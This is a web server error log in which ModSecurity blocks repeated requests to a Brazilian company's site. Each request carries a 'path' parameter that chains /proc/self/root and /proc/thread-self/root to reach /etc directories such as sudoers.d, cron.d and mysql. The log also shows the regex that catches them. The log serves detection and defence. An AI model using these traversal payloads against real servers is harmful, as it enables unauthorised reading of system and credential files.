[Mon Mar 16 10:42:59.054187 2026] [:error] [pid 10709:tid 140411641214720] [client 74.7.241.46:43136] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgI4xXjF1vJNtV6CWrtJAAAAcw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:43:00.391422 2026] [:error] [pid 10772:tid 140411674785536] [client 74.7.241.46:45286] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgI5P9ocpUE4ed4uDziAgAAAgg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:43:25.115308 2026] [:error] [pid 10651:tid 140411582465792] [client 74.7.243.203:42946] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgI_bysWC90G-1nBrA5_gAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:43:26.172609 2026] [:error] [pid 21946:tid 140411632822016] [client 74.7.241.46:45296] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgI_nbQATo66fKoS7xBUQAAAM0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:43:27.531126 2026] [:error] [pid 21946:tid 140411658000128] [client 74.7.241.46:44258] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgI_3bQATo66fKoS7xBUwAAAMo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:43:29.750365 2026] [:error] [pid 10709:tid 140411607643904] [client 74.7.243.203:47002] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJARXjF1vJNtV6CWrtKQAAAdA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:43:36.768584 2026] [:error] [pid 21946:tid 140411733534464] [client 74.7.241.46:36784] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJCHbQATo66fKoS7xBYQAAAME"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:43:38.056243 2026] [:error] [pid 32654:tid 140411691570944] [client 74.7.241.46:36788] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJCglT9VtDQc7bgUyhEQAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:43:39.209059 2026] [:error] [pid 32654:tid 140411666392832] [client 74.7.241.46:50204] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJCwlT9VtDQc7bgUyhEgAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:43:39.944188 2026] [:error] [pid 21946:tid 140411666392832] [client 74.7.243.203:38102] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJC3bQATo66fKoS7xBaAAAAMk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:43:40.528086 2026] [:error] [pid 32654:tid 140411725141760] [client 74.7.241.46:50212] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJDAlT9VtDQc7bgUyhFQAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:43:41.711244 2026] [:error] [pid 10831:tid 140411607643904] [client 74.7.241.46:50222] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJDY6lpbStxTqkSktiDgAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:44:03.081256 2026] [:error] [pid 21533:tid 140411658000128] [client 74.7.241.46:50228] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJI3jZBu2q05ozVU9J-AAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:44:04.425796 2026] [:error] [pid 21806:tid 140411599251200] [client 74.7.241.46:50610] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJJNSswJuvopo3lOhT8gAAAJE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:44:11.235392 2026] [:error] [pid 11972:tid 140411725141760] [client 74.7.241.46:50626] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJK5qj1wV0Si-OkeffAwAAAAI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:44:13.555215 2026] [:error] [pid 11972:tid 140411616036608] [client 74.7.241.46:56650] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJLZqj1wV0Si-OkeffCQAAAA8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:44:14.899802 2026] [:error] [pid 32654:tid 140411691570944] [client 74.7.241.46:56656] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJLglT9VtDQc7bgUyhHwAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:44:16.039137 2026] [:error] [pid 10651:tid 140411725141760] [client 74.7.241.46:56666] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJMLysWC90G-1nBrA6DAAAAYI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:44:23.516950 2026] [:error] [pid 10772:tid 140411590858496] [client 74.7.241.46:56668] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJN_9ocpUE4ed4uDziFQAAAhI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:44:24.886999 2026] [:error] [pid 21806:tid 140411632822016] [client 74.7.241.46:36574] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJONSswJuvopo3lOhT9wAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:44:28.123519 2026] [:error] [pid 21806:tid 140411624429312] [client 74.7.241.46:36584] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJPNSswJuvopo3lOhT_AAAAI4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:44:30.890354 2026] [:error] [pid 10831:tid 140411649607424] [client 74.7.243.203:57396] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJPo6lpbStxTqkSktiPgAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:44:32.173000 2026] [:error] [pid 21533:tid 140411716749056] [client 74.7.243.203:33422] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJQHjZBu2q05ozVU9J_wAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
